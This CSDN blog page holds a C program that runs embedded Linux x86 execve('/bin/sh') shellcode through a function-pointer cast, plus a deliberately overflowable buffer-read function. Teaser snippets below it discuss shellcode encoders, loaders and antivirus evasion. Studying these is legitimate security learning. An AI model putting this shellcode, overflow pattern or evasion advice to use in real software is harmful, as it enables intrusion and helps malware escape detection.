(*(void(*)())&shellcode)();

最新推荐文章于 2024-08-04 23:37:01 发布
最新推荐文章于 2024-08-04 23:37:01 发布
阅读量325 收藏
点赞数 1
分类专栏: C语言数据结构 文章标签: c++ 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_34071268/article/details/125857222
版权 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char shellcode[100]= "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

void vulnerable_function()
{
    char buf[128];
    read(STDIN_FILENO, buf, 256);
}
int main(int argc, char** argv)
{
    (*(void(*)())&shellcode)();
//    vulnerable_function();
//    write(STDOUT_FILENO, "Hello, World\n", 13);
}
手戳shellcode编写 第一课(动态函数地址调用函数)
啊渊的专栏
08-21 514
在程序免杀中,我们通常不会直接通过函数名称方式来调用函数,一般都是通过执行shellcode来执行我们需要的代码。如果直接将exe文件解析出来的shellcode会发现这些shellcode不能直接运行,因为函数地址调用的问题。因此我们需要动态获取函数地址来调用shellcode。为了了解shellcode的基础,我们先使用c++源码方式来学习,如果动态的获取函数地址,然后再使用汇编编写以下功能实现shellcode的完成编写。
ShellCode异或编码器实现
信息安全
09-23 904
编码器是将原始的 shellcode 转换为一种在目标环境中可以安全传输或存储的格式。通过将原始 shellcode 的每个字节进行某种操作(如 XOR、加法、字节替换等),以避免生成无效字符或被检测的字符。
(*(void (*) () )shellcode) ();的含义
Yannie's Blog
12-07 1093
我们在写执行shellcode的语句的时候,可以直接写成这样的一行 ( * (void ( * ) () )shellcode) () 那这一行又是什么意思呢? 我们来从简单的开始: typedef void (*Fun) (void)是什么意思呢? 这里我们就需要了解:typedef有一个用法,可以用来定义函数指针 此处 Fun 是指向这样一个函数的指针,该函数的返回值为void类型,函数没有参...
shellcode编写
qq_39153421的博客
08-02 1228
1.前言漏洞利用最重要的就是shellcode的编写,漏洞发现者在漏洞发现之初并不会给出完整的shellcode,所以我们要学会自己编写shellcode。注:shellcode中不能出现NULL和/x00,存在其一再利用的时候会被截断。 2.什么是Shellcode shellcode是用作利用软件漏洞的有效载荷的一小段代码,因为它通常启动一个命令shell,攻击...
shellcode
DoasIsay的博客
09-15 777
写过shellcode的都写过这样的语句,unsigned char shellcode[]={};  ((void (*)())(&shellcode))(); 然而输出shellcode,&shellcode&shellcode[0]它们的值却是一样的,但在这里为什么却只能用&shellcode? 如果将它们自身的值各自增一再输出你就会看到不同的结果,这是为什么? 现以window
演示几种用c语言来执行shellcode(其实也就是机器码)的方式,shellcode(示例代码)
weixin_36200896的博客
05-24 898
简介这篇文章主要介绍了shellcode(示例代码)以及相关的经验技巧,文章约1446字,浏览量241,点赞数8,值得推荐!/** 作者: 冷却* 时间: 2009年2月21日* E-mail: leng_que@yahoo.com.cn* 描述: 演示几种用C语言来执行shellcode(其实也就是机器码)的方式* 备注:在WindowsXP SP3下测试成功*///一段打开Windo...
一个简单用来生成shellcode的类
azraelxuemo的博客
01-26 243
前几天在生成shellcode的时候用的硬编码,后来自己写了个类,可以用来接收一些地址什么的动态生成 class SHELLCODE { public: int size; int now_point; BYTE* shellcode; SHELLCODE(int size); void append(BYTE payload); void append(WORD payload); void append(DWORD payload); void push(LONG payload);
[HACK学习呀] - 2020-02-08 干货 - Shellcode免杀总结<一>1
08-03
Shellcode免杀总结<一> Shellcode免杀是指在anti-virus软件和入侵检测系统中规避检测的技术。本文将Shellcode免杀技巧分为“分离”和“混淆”两个大类,并针对不同检测方式进行讲解。 一、分离免杀 Shellcode...
shellcode加密免杀
longwanlian的博客
08-04 758
先说结论,笔者没成功过360。
java 加载shellcode_通用Shellcode加载器
weixin_35780426的博客
02-26 1055
Shellcode加载器是一种基本的规避技术。尽管shellcode加载器通常可以促进payload的初始执行,但是启发式检测方法仍可以标记payload的其他方面和行为。例如,很多安全产品可能会在内存中时对其进行检测,或者将特定的网络流量检测为恶意。我们将研究一些适合与加载器结合使用的后期开发框架,并研究如何嵌入其他类型的二进制文件(例如.NET和已编译的PE二进制文件)。博客系列的第一部分将介...
linux c语言shellcode,shellcode编写
weixin_36287955的博客
05-12 928
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?​ shellcode可以用于在栈溢出或者堆溢出的漏洞中用于跳转后执行的代码。本文的代码是在ubuntu 18.04 64位的linux操作系统。​ 首先是一个用于执行shellcode的c语言程序:123456char shellcode[] = "";int (int argc, char...
shellcode学习
weixin_52878095的博客
03-12 4965
一道题目 最近在buu上面刷题的时候发现了一道题目 ciscn_2019_s_9 ,这道题目需要我们自己编写 shellcode ,以前 shellcode 都是从 pwntools 或者是msf里面直接生成的,所以借此机会来学习一下 shellcode 的编写 我们先检查一下附件的保护机制 ,啥保护也没开,所以我们可以直接在栈上面构造shellcode然后执行 丢到IDA里面看一下,这里变量s的栈空间只有.0x20大小,而fgets函数可以读入50即0x32,所以存在栈溢出 我们看一下 pwntool
对抗无落地的shellcode注入
hongduilanjun的博客
07-21 2175
一般的shellcode加载到内存都是通过和来获取函数进行shellcode加载,亦或是通过远程申请一块空间来放入shellcode的地址进行加载。为了隐蔽,攻击者通常会通过PEB找到链表,自己去定位函数从而规避杀软对导入表的监控。攻击者先把shellcode加密,在写入时解密存放到内存空间,使用基于文件检测的方法,是无能为力的,那么这种无落地的方式,最终都会在内存中一览无余。...
ShellCode原理以及编写
qq_18811919的博客
07-02 3116
0x0 ShellCode编写注意事原理 1)不能使用字符串的直接偏移 即使你在C/C++代码中定义一个全局变量,一个取值为“Hello world”的字符串,或直接把该字符串作为参数传递给某个函数。但是,编译器会把字符串放置在一个特定的Section中(如.rdata或.data)。 2)不能确定函数的地址(如printf) 在shellcode中,我们却不能以逸待劳了。因为我们无法确定包含所需函数的DLL文件是否已经加载到内存。受ASLR(地址空间布局随机化)机制的影响,系统不会每次都把DLL文件加载
shellCode 公式
网瘾少年丶的博客
05-26 569
E8 E9后的地址公式如下: X = 真正要跳转的地址 - E8这一条指令的下一行指令 等价于 X = 真正要跳转的地址 - (eip + 5) E8 X E9 X BYTE ShellCode[]={0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0xE8,0x00,0x00,0x00,0x00,0xE9,0x00,0x00,0x00,0x0...
执行shellcode的几种方式
qq_41683305的博客
02-24 5156
首先写出汇编成功弹出计算器 #pragma comment(linker,"/section:.data,RWE") //data段可读写 #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") //不显示窗口 #pragma comment(linker,"/INCREMENTAL:NO") //指...
c语言调用机器码,演示几种用C语言来执行shellcode(其实也就是机器码)的方式
weixin_36415206的博客
05-20 1106
/** 作者: 冷却* 时间: 2009年2月21日* E-mail: leng_que@yahoo.com.cn* 描述: 演示几种用C语言来执行shellcode(其实也就是机器码)的方式* 备注:在WindowsXP SP3下测试成功*///一段打开Windows计算器(calc.exe)的shellcodeunsigned char shellcode[] ="/xb8/x82/...
shellcode免杀思路
u013367305的博客
05-04 1631
shellcode免杀思路 使用msfconsole生产的shellcode之后正常写入到程序的内存里面的话会直接被杀毒软件静态查杀就能杀掉。 如果我们直接把shellcode贴入到自己程序中的话,编译出来的exe文件就会带上这段byte,而杀毒软件对此非常敏感所以会直接被杀掉。 // An highlighted block unsigned char sendBuf[355] = "\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x5
jmp *eax
最新发布
03-29
<think>好的,我需要回答用户关于x86汇编中`jmp *eax`指令的用法和含义的问题。首先,我需要回忆一下x86汇编中的间接跳转指令。间接跳转是指跳转的目标地址不是直接给出的,而是通过寄存器或内存位置中的值来指定的。在这种情况下,`jmp *eax`意味着程序将跳转到存储在EAX寄存器中的地址。 接下来,我应该验证这个理解是否正确。查阅相关资料,确认在AT&T语法中,间接跳转通常用`*`符号表示操作数是寄存器或内存地址中的值。例如,`jmp *eax`确实会将控制权转移到EAX中的地址。而Intel语法可能写作`jmp eax`,不需要星号。 然后,考虑这种指令的常见应用场景。比如,在函数指针调用、跳转表(如switch语句的实现)、动态代码生成或修改以及某些shellcode中可能会用到间接跳转。需要具体例子来说明这些情况,让用户更容易理解。 还要注意可能的问题,比如如果EAX中的值不是有效的代码地址,会导致程序崩溃。此外,不同的汇编器语法可能有所差异,需要指出AT&T和Intel语法的区别。 最后,生成相关问题,帮助用户进一步学习。可能的问题包括间接跳转的其他寄存器使用、与call指令的区别、实际应用示例等。 总结以上内容,组织成结构清晰的回答,并确保引用相关的参考资料,比如关于寄存器使用的引用[1]和[2],以及可能的其他引用。同时,检查LaTeX格式是否正确,行内公式用$...$,独立公式用$$...$$,确保没有语法错误。</think>### 关于`jmp *eax`指令的用法与含义 在x86汇编语言中,`jmp *eax`是一条**间接跳转指令**,其含义是将程序执行流程跳转到寄存器`EAX`中存储的地址值。以下是详细解释: --- #### 1. **指令的语法与操作** - **语法形式**:在AT&T汇编语法中,`*`符号表示操作数是寄存器或内存地址中的值。因此`jmp *eax`表示跳转到`EAX`寄存器中存储的地址。 - **等价Intel语法**:在Intel语法中,通常写作`jmp eax`(省略`*`符号)。 - **操作逻辑**:CPU会将`EAX`的值直接作为目标地址,更新指令指针寄存器(`EIP`或`RIP`),从而跳转到该地址执行代码[^2]。 --- #### 2. **典型应用场景** - **函数指针调用**:通过寄存器动态指定函数地址,例如C语言中的函数指针: ```c void (*func_ptr)() = some_function; func_ptr(); // 编译后可能生成类似`jmp *eax`的指令 ``` - **跳转表(Jump Table)**:在`switch`语句或状态机中,通过查表跳转到不同分支: ```assembly ; 示例:跳转表实现 jmp *jump_table(,%eax,4) ; 假设EAX是索引,跳转表每项占4字节 ``` - **动态代码生成**:在实时编译(JIT)或自修改代码中,动态计算目标地址并存入`EAX`后跳转。 - **Shellcode利用**:在漏洞利用中,通过控制`EAX`指向攻击载荷的地址,实现代码执行[^1]。 --- #### 3. **注意事项** - **有效性检查**:若`EAX`未指向有效代码地址(如包含非法值),会导致程序崩溃(如段错误)。 - **寄存器选择**:除`EAX`外,其他通用寄存器(如`EBX`、`ECX`)也可用于间接跳转,具体取决于调用约定和场景[^1]。 - **与`call`的区别**:`call *eax`会先将返回地址压栈,再跳转;而`jmp *eax`不保存返回地址。 --- #### 4. **示例代码片段** ```assembly ; 示例:通过EAX跳转到0x8048000 mov eax, 0x8048000 jmp *eax ``` ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值